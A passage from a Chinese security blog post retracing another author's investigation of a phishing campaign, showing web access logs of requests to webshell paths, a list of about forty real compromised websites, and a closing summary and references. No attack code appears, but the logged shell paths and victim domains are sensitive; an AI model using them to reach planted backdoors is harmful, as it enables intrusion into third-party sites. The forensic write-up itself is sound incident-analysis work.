29.205.113.8 (尼日利亚) - - [30/Nov/2018//www.rosturplast.com/shells/config.php&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36&quot;
212.1.211.3 美国 - - [30/Nov/2018:13:35:36 -0300] &quot;GET /online/templates/beez5/bc.php HTTP/1.1&quot; 200 16823 &quot;-&quot; &quot;Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)&quot;
178.128.221.199 希腊- - [29/Nov/2018//www.zebramedia.al/wp-content/themes/shells/INSTALL.sql.txt.php&quot; &quot;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36&quot;
197.211.61.82 尼日利亚) - - [29/Nov/2018//www.zebramedia.al/wp-content/themes/shells/INSTALL.sql.txt.php&quot; &quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36&quot;
</code></pre>
<h3 id="5-被黑网站"><a href="#5-被黑网站" class="headerlink" title="(5)被黑网站"></a><strong>(5)被黑网站</strong></h3><pre><code class="hljs">不完全统计
rosturplast.com
mirohaviar.sk
helioncomposites.com
radiolanalhue.cl
zebramedia.al
www.qtfontebispo.com
www.seoeaze.com
vilapoucadeaguiar.com
proyectosphr.cl
u-p.com
www.humanaconsultores.cl
amsogroup.com
www.tdftechnologies.com
www.bvvagos.pt
www.huellasdigitales.cl
lince.apsl.edu.pl
www.fica.unsl.edu.ar
proyectosphr.cl
www.zlobek.uw.edu.pl
ifr.pt
mail.ijrer.org
www.hkmms.org.hk
historia.apsl.edu.pl
www.homeguide.com.sg
onlinecombos.co.in
umo.apsl.edu.pl
www.bpmp2t.lombokbaratkab.go.id
amsogroup.com
viper.cl
www.teniscavancha.cl
www.estacaomedica.pt
terrarestobar.cl
jf-bragado.pt
helioncomposites.com
notariabasualto.cl
ericdiblasi.com
reinamarltda.cl
cobraz.pt
www.stmarypellaia.com
webcam.wm-itservice.at
</code></pre>
<h2 id="0X07-攻击路径还原"><a href="#0X07-攻击路径还原" class="headerlink" title="0X07 攻击路径还原"></a><strong>0X07 攻击路径还原</strong></h2><p>这个图画的也非常的专业，使用的是 <a target="_blank" rel="noopener" href="https://www.processon.com/">processon</a> 配合 <a target="_blank" rel="noopener" href="https://www.iconfont.cn/">iconfont</a> 绘制而成的。</p>
<h2 id="0X08-总结"><a href="#0X08-总结" class="headerlink" title="0X08 总结"></a><strong>0X08 总结</strong></h2><p>本文主要是尽可能的根据原文的思路结合自己的实践回顾一下原作者对整个事件的分析流程，整个过程中涉及到很多渗透的技巧和社会工程学的知识，走了一遍以后还是大有收获，但也因为这样其中很多内容是复制于原文，就当是一次学习笔记吧，原作者是对钓鱼的回溯，我是对作者文章的回溯，仅此而已，毕竟，少就是多，慢就是快。</p>
<h2 id="0X09-参考"><a href="#0X09-参考" class="headerlink" title="0X09 参考"></a><strong>0X09 参考</strong></h2><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/195090.html">https://www.freebuf.com/vuls/195090.html</a><br><a target="_blank" rel="noopener" href="https://www.altn.com.cn/2153.html">https://www.altn.com.cn/2153.html</a><br><a target="_blank" rel="noopener" href="https://www.webshell.cc/5211.html">https://www.webshell.cc/5211.html</a><br><a target="_blank" rel="noopener" href="https://pentestlab.blog/2017/09/25/suid-executables/">https://pentestlab.blog/2017/09/25/suid-executables/</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="category-chain-item">渗透测试</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="print-no-link">#渗透测试</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>有关“邮件钓鱼攻击与溯源”一文的阅读回溯</div>
      <div>http://example.com/2020/01/20/有关“邮件钓鱼攻击与溯源”一文的阅读回溯/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>January 20, 2020</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2019/07/29/%E5%AF%B9%E4%B8%80%E6%AC%A1%20redis%20%E6%9C%AA%E6%8E%88%E6%9D%83%E5%86%99%E5%85%A5%E6%94%BB%E5%87%BB%E7%9A%84%E5%88%86%E6%9E%90%E4%BB%A5%E5%8F%8A%20redis%204.x%20RCE%20%E5%AD%A6%E4%B9%A0/" title="对一次 redis 未授权写入攻击的分析以及 redis 4.x RCE 学习">
                        <span class="hidden-mobile">对一次 redis 未授权写入攻击的分析以及 redis 4.x RCE 学习</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
